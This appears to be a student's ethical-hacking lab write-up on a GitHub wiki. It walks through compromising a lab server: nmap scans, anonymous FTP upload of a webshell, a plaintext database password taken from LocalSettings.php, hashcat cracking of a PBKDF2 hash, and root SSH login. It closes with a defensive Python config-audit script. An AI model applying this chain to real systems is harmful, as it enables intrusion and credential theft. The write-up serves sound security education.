Lab 7.1 Exploiting Pippin - JimKnee-Champ/Ethical-Hacking-Journal GitHub Wiki
nslookup pippin.shire.local 10.0.5.22 (all we were given was the name of the server, so we use nslookup to resolve that name against the known DNS server) - This told us pippin's IP was 10.0.5.25.
sudo nmap -sV 10.0.5.25 (service/version scan on the targeted IP.) This revealed that ports 21, 22, and 80 were open, running ftp, ssh, and http respectively.
sudo nmap -A -p 21,22,80 10.0.5.25 (detailed scan on the specified ports) This showed information about each service, namely that port 21, running ftp, seemed vulnerable/misconfigured.
sudo nmap -A -p 21 --script-args ftp-anon.maxlist=-1 10.0.5.25 (lists all files in the top-level directory of the ftp service) The scanned ftp port listed many files and directories, likely stemming from a single directory the service was based out of. With this script argument the scan listed all of them rather than truncating the listing.
We can log into pippin.shire.local using the anonymous ftp connection. Command: ftp 10.0.5.25 (the IP address of pippin.shire.local). Username: anonymous. Password: none, just hit enter.
We are able to upload any file we want to the system, and navigate to relevant directories using a browser and URL directory traversal. We can upload a reverse shell that will allow us to execute commands as a non-privileged user on the system. Using this, we can cat out the contents of various files.
We can also pull files off the system. Relevant commands when connected with ftp: put and get. These push and pull files to and from the directory you began ftp communication with the server in.
The LocalSettings.php file had the system admin's MySQL root account password stored in plaintext. We are able to use this to access the MySQL database and display relevant information. This was also their main account password, so we are now able to ssh into the server as peregrin.took.
We can use the MySQL database to display the contents of the "user" table, which contains relevant username and password info, namely for the admin account.
To crack the hash, change the format from "pbkdf2:sha512:30000:64:RjELMZH8kG0rs+qSJkmMnQ==:7vGhAdzcOMmRPW/MEoMlF+SJ68zJy+FQ5SFpmuGGJt1erhLunw9/ecHTAxXue+7xlnW7nHyB9AbBkLWNA1c6cw==" to "sha512:30000:RjELMZH8kG0rs+qSJkmMnQ==:7vGhAdzcOMmRPW/MEoMlF+SJ68zJy+FQ5SFpmuGGJt1erhLunw9/ecHTAxXue+7xlnW7nHyB9AbBkLWNA1c6cw=="; essentially, remove everything before the sha512 and also remove the 64 after it.
This was exceptionally slow on the kali system, so I downloaded hashcat on my personal machine and ran it the same way I did on kali. Thankfully, the program doesn't function any differently on windows than on linux (or so it appeared to me) and the process completed in less than 1 minute total, revealing the password.
Using ssh, it was possible to log into the root account (meaning they hadn't secured the server against root access over ssh, another security flaw) and display the root flag as we had the peregrin user's flag.
List of commands in total:
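As an added defender's-side example (written for this page, not part of the original journal): the chain above only worked because of three server-side configuration choices, anonymous FTP with uploads allowed, MediaWiki's LocalSettings.php connecting to MySQL as root with a password that was reused for a shell account, and SSH permitting root login. The Python below parses constructed vsftpd.conf, sshd_config and LocalSettings.php fragments, reports those settings, and shows a hardened version of each that audits clean. The directive names are the standard vsftpd, OpenSSH and MediaWiki ones; the sample contents and password values are placeholders, not copied from the lab machine.

```python
"""Static audit of the misconfigurations the lab chained together:
anonymous FTP upload, the wiki's database user being MySQL root, and
root login permitted over SSH. Added example; all inputs are constructed."""

import re

# --- constructed sample inputs (not from pippin.shire.local) ---------------

VSFTPD_WEAK = """\
listen=YES
# anyone can log in as 'anonymous' and drop files into the served tree
anonymous_enable=YES
anon_upload_enable=YES
write_enable=YES
"""

VSFTPD_HARDENED = """\
listen=YES
anonymous_enable=NO
write_enable=NO
local_enable=YES
chroot_local_user=YES
"""

SSHD_WEAK = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

SSHD_HARDENED = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
"""

# MediaWiki LocalSettings.php fragments; the password is a placeholder.
LOCALSETTINGS_WEAK = """\
<?php
$wgDBtype = "mysql";
$wgDBname = "mariawiki_db";
$wgDBuser = "root";
$wgDBpassword = "PLACEHOLDER-NOT-A-REAL-PASSWORD";
"""

LOCALSETTINGS_HARDENED = """\
<?php
$wgDBtype = "mysql";
$wgDBname = "mariawiki_db";
$wgDBuser = "mediawiki";
$wgDBpassword = "PLACEHOLDER-NOT-A-REAL-PASSWORD";
"""


def parse_directives(text, assignment):
    """Return {lowercased key: value} for 'key=value' (vsftpd) or
    'Key value' (sshd) lines. Comments and blank lines are skipped and the
    first occurrence of a key wins, which is how sshd_config resolves it."""
    out = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(assignment)
        key = key.strip().lower()
        if key and key not in out:
            out[key] = value.strip()
    return out


def audit_vsftpd(conf):
    d = parse_directives(conf, "=")
    findings = []
    # vsftpd.conf(5) documents the upstream default of anonymous_enable as
    # YES (distro packages usually override it), so an absent key is unsafe.
    anon = d.get("anonymous_enable", "YES").upper() == "YES"
    write = d.get("write_enable", "NO").upper() == "YES"
    anon_upload = d.get("anon_upload_enable", "NO").upper() == "YES"
    if anon:
        findings.append("ftp: anonymous login enabled")
        if write and anon_upload:
            findings.append("ftp: anonymous users may upload files "
                            "(write_enable=YES with anon_upload_enable=YES)")
    return findings


def audit_sshd(conf):
    d = parse_directives(conf, " ")
    findings = []
    # OpenSSH defaults: PermitRootLogin prohibit-password, PasswordAuthentication yes
    if d.get("permitrootlogin", "prohibit-password").lower() == "yes":
        findings.append("ssh: PermitRootLogin yes lets root authenticate with a password")
    if d.get("passwordauthentication", "yes").lower() == "yes":
        findings.append("ssh: password authentication enabled; a reused or "
                        "cracked password is enough for a shell")
    return findings


PHP_ASSIGN = re.compile(r'^\s*\$(wg\w+)\s*=\s*["\']([^"\']*)["\']\s*;', re.M)


def audit_localsettings(php):
    settings = dict(PHP_ASSIGN.findall(php))
    findings = []
    if settings.get("wgDBuser", "").lower() == "root":
        findings.append("mediawiki: $wgDBuser is the MySQL root account; "
                        "use a dedicated least-privilege database user")
    return findings


if __name__ == "__main__":
    for label, conf, fn in [("vsftpd", VSFTPD_WEAK, audit_vsftpd),
                            ("sshd", SSHD_WEAK, audit_sshd),
                            ("LocalSettings.php", LOCALSETTINGS_WEAK, audit_localsettings)]:
        for f in fn(conf):
            print(f"[{label}] {f}")
```

The checks are deliberately narrow: they catch the settings this lab abused, not everything wrong with an FTP or SSH deployment. Note that even the hardened LocalSettings.php still holds the database password in cleartext, which MediaWiki requires; the mitigation there is a least-privilege database user, a password not shared with any shell account, and keeping the file out of any tree that anonymous FTP or directory traversal can reach.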
nmap commands for network discovery listed above
ftp 10.0.5.25 (user: anonymous, password: (none))
put webshell.php (webshell.php being in the directory the connection was initiated from)
get (relevant filename) (filename on system)
ssh (username)@(ip address) - in this case, peregrin.took@10.0.5.25 (password pippintook, from the LocalSettings.php file we got from the server)
mysql -u (username) -p (for password) - username was root, password was entered after the command as "pippintook"
show databases;
use (database name); - in this case, mariawiki_db, again from the local settings file
show tables;
describe (table name); - in this case, the user table
select (table attribute, table attribute) from (table name); in this case, user_name and user_password FROM user
hashcat -m 12100 (input file, just the string without the username as described above) -w 4 -a 0 -o (output file) (wordlist)
hashcat -m 12100 shireadmin.txt -w 4 -a 0 -o shirecracked rockunderscore.txt
ssh root@10.0.5.25 - use the password cracked from the mysql database/table